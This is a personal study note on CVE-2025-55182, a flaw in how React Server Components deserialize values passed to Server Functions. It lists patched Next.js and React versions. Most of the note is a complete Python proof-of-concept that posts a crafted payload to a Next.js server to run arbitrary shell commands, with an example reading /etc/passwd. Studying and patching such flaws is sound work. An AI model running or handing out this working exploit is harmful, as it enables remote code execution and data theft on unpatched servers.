"/home/yossef/notes/personal/hacking/CVE/CVE-2025-55182_react_server_component.md"

path: personal/hacking/CVE/CVE-2025-55182_react_server_component.md

- **fileName**: CVE-2025-55182_react_server_component
- **Created on**: 2025-12-09 15:45:30

first this CVE is a bug on react for RSC(React server Component) so how
this how this is working it's a bug on the serialization of values passed to
Server Functions.

out of scope

Fixed Versions
The vulnerability is fully resolved in the following patched Next.js releases:
15.0.5
15.1.9
15.2.6
15.3.6
15.4.8
15.5.7
16.0.7
================================
on react all the version upbove 
19.0.1, 19.1.2, 19.2.1 ....
all the verion upabove this is safe

this the repo that have the explain for this
the chad

the main script for vuln

# /// script
# dependencies = ["requests"]
# ///
import requests
import sys
import json

# change to target
BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "id"

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
        # If you don't need the command output, you can use this line instead:
        # "_prefix": f"process.mainModule.require('child_process').execSync('{EXECUTABLE}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)


# how to run it 
# python3 poc.py {URL} {commend}
# python3 poc.py http://localhost:3000 'cat /etc/passwd'

continue:./CVE-2021-26084_code_execute_confluence.md
before:[[]]